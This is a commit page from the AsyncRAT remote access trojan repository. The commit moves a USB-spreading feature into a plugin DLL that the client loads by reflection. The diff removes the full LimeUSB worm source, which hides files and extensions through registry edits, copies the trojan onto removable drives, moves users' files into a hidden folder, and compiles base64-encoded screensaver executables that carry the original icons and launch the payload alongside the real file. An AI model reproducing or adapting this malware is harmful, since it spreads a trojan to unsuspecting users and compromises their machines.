Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add DLL for usb spread

Browse Source
This commit is contained in:
NYAN CAT 2019-06-11 14:55:37 +03:00
parent 81172b977a
commit c0f1d8f4bb
5 changed files with 21 additions and 201 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
View File

@ -851,6 +851,7 @@ namespace AsyncRAT_Sharp
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "usbSpread";
msgpack.ForcePathObject("Plugin").SetAsBytes(Properties.Resources.HandleLimeUSB);
foreach (ListViewItem itm in listView1.SelectedItems)
{
Clients client = (Clients)itm.Tag;

10
AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs generated
View File

@ -194,6 +194,16 @@ namespace AsyncRAT_Sharp.Properties {
}
}
/// <summary>
/// Looks up a localized resource of type System.Byte[].
/// </summary>
internal static byte[] HandleLimeUSB {
get {
object obj = ResourceManager.GetObject("HandleLimeUSB", resourceCulture);
return ((byte[])(obj));
}
}
/// <summary>
/// Looks up a localized resource of type System.Drawing.Bitmap.
/// </summary>

3
AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx
View File

@ -238,4 +238,7 @@
<data name="save-image2" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\save-image2.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="HandleLimeUSB" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\HandleLimeUSB.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
</root>

BIN
AsyncRAT-C#/AsyncRAT-Sharp/Resources/HandleLimeUSB.dll Normal file
View File

Binary file not shown.

208
AsyncRAT-C#/Client/Handle Packet/HandleLimeUSB.cs
View File

@ -1,16 +1,6 @@
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Drawing.IconLib; // AsyncRAT-C#\packages\IconLib
using Microsoft.Win32;
using System.Drawing;
using Microsoft.CSharp;
using System.CodeDom.Compiler;
using Client.MessagePack;
using Client.MessagePack;
using Client.Sockets;
using System.Windows.Forms;
using System.Reflection;
//
// │ Author : NYAN CAT
// │ Name : LimeUSB v0.3
@ -23,45 +13,12 @@ namespace Client.Handle_Packet
{
public class HandleLimeUSB
{
public void Run()
public HandleLimeUSB(MsgPack unpack_msgpack)
{
Initialize();
}
private void Initialize()
{
ExplorerOptions();
int count = 0;
foreach (DriveInfo usb in DriveInfo.GetDrives())
{
try
{
if (usb.DriveType == DriveType.Removable && usb.IsReady)
{
if (!Directory.Exists(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory))
{
Directory.CreateDirectory(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory);
File.SetAttributes(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory, FileAttributes.System | FileAttributes.Hidden);
}
if (!Directory.Exists((usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory)))
Directory.CreateDirectory((usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory));
if (!File.Exists(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile))
File.Copy(Application.ExecutablePath, usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile);
CreteDirectory(usb.RootDirectory.ToString());
InfectFiles(usb.RootDirectory.ToString());
count++;
}
}
catch (Exception ex)
{
Debug.WriteLine("Initialize " + ex.Message);
}
}
Assembly loader = Assembly.Load(unpack_msgpack.ForcePathObject("Plugin").GetAsBytes());
MethodInfo meth = loader.GetType("HandleLimeUSB.HandleLimeUSB").GetMethod("Initialize");
object injObj = loader.CreateInstance(meth.Name);
int count = (int)meth.Invoke(injObj, null);
if (count > 0)
{
MsgPack msgpack = new MsgPack();
@ -70,156 +27,5 @@ namespace Client.Handle_Packet
ClientSocket.Send(msgpack.Encode2Bytes());
}
}
private void ExplorerOptions()
{
try
{
RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", true);
if (key.GetValue("Hidden") != (object)2)
key.SetValue("Hidden", 2);
if (key.GetValue("HideFileExt") != (object)1)
key.SetValue("HideFileExt", 1);
}
catch { }
}
private void InfectFiles(string path)
{
foreach (var file in Directory.GetFiles(path))
{
try
{
if (CheckIfInfected(file))
{
ChangeIcon(file);
File.Move(file, file.Insert(3, spreadSettings.WorkDirectory + "\\"));
CompileFile(file);
}
}
catch { }
}
foreach (var directory in Directory.GetDirectories(path))
{
try
{
if (!directory.Contains(spreadSettings.WorkDirectory))
InfectFiles(directory);
}
catch { }
}
}
private void CreteDirectory(string usbDirectory)
{
foreach (var directory in Directory.GetDirectories(usbDirectory))
{
try
{
if (!directory.Contains(spreadSettings.WorkDirectory))
{
if (!Directory.Exists(directory.Insert(3, spreadSettings.WorkDirectory + "\\")))
Directory.CreateDirectory(directory.Insert(3, spreadSettings.WorkDirectory + "\\"));
CreteDirectory(directory);
}
}
catch { }
}
}
private bool CheckIfInfected(string file)
{
try
{
FileVersionInfo info = FileVersionInfo.GetVersionInfo(file);
if (info.LegalTrademarks == spreadSettings.InfectedTrademark)
return false;
else
return true;
}
catch
{
return false;
}
}
private void ChangeIcon(string file)
{
try
{
Icon fileIcon = Icon.ExtractAssociatedIcon(file);
MultiIcon multiIcon = new MultiIcon();
SingleIcon singleIcon = multiIcon.Add(Path.GetFileName(file));
singleIcon.CreateFrom(fileIcon.ToBitmap(), IconOutputFormat.Vista);
singleIcon.Save(Path.GetPathRoot(file) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(file.Replace(" ", null)) + ".ico");
}
catch { }
}
private void CompileFile(string infectedFile)
{
try
{
string source = Encoding.UTF8.GetString(Convert.FromBase64String("dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7CnVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpbYXNzZW1ibHk6IEFzc2VtYmx5VHJhZGVtYXJrKCIlTGltZSUiKV0KW2Fzc2VtYmx5OiBHdWlkKCIlR3VpZCUiKV0KCnN0YXRpYyBjbGFzcyBMaW1lVVNCTW9kdWxlCnsKICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBNYWluKCkKICAgIHsKICAgICAgICB0cnkKICAgICAgICB7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJUZpbGUlIik7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJVBheWxvYWQlIik7CiAgICAgICAgfQogICAgICAgIGNhdGNoIHsgfQogICAgfQp9"));
source = source.Replace("LimeUSBModule", Randomz(new Random().Next(6, 12)));
source = source.Replace("%Payload%", Path.GetPathRoot(infectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile);
source = source.Replace("%File%", infectedFile.Insert(3, spreadSettings.WorkDirectory + "\\"));
source = source.Replace("%Lime%", spreadSettings.InfectedTrademark);
source = source.Replace("%Guid%", Guid.NewGuid().ToString());
CompilerParameters cParams = new CompilerParameters();
Dictionary<string, string> providerOptions = new Dictionary<string, string>();
providerOptions.Add("CompilerVersion", GetOS());
string options = "/target:winexe /platform:x86 /optimize+";
if (File.Exists(Path.GetPathRoot(infectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(infectedFile.Replace(" ", null)) + ".ico"))
options += " /win32icon:\"" + Path.GetPathRoot(infectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(infectedFile.Replace(" ", null)) + ".ico" + "\"";
cParams.GenerateExecutable = true;
cParams.OutputAssembly = infectedFile + ".scr";
cParams.CompilerOptions = options;
cParams.TreatWarningsAsErrors = false;
cParams.IncludeDebugInformation = false;
cParams.ReferencedAssemblies.Add("System.dll");
CompilerResults results = new CSharpCodeProvider(providerOptions).CompileAssemblyFromSource(cParams, source);
}
catch (Exception ex)
{
Debug.WriteLine("CompileFile " + ex.Message);
}
}
private string GetOS()
{
var os = new Microsoft.VisualBasic.Devices.ComputerInfo();
if (os.OSFullName.Contains("7"))
return "v2.0";
else
return "v4.0";
}
private string Randomz(int L)
{
string validchars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
StringBuilder sb = new StringBuilder();
Random rand = new Random();
for (int i = 1; i <= L; i++)
{
int idx = rand.Next(0, validchars.Length);
char randomChar = validchars[idx];
sb.Append(randomChar);
}
var randomString = sb.ToString();
return randomString;
}
}
public class spreadSettings
{
public static readonly string InfectedTrademark = "Trademark - Lime";
public static readonly string WorkDirectory = "$LimeUSB";
public static readonly string LimeUSBFile = Path.GetFileName(Application.ExecutablePath);
public static readonly string IconsDirectory = "$LimeIcons";
}
}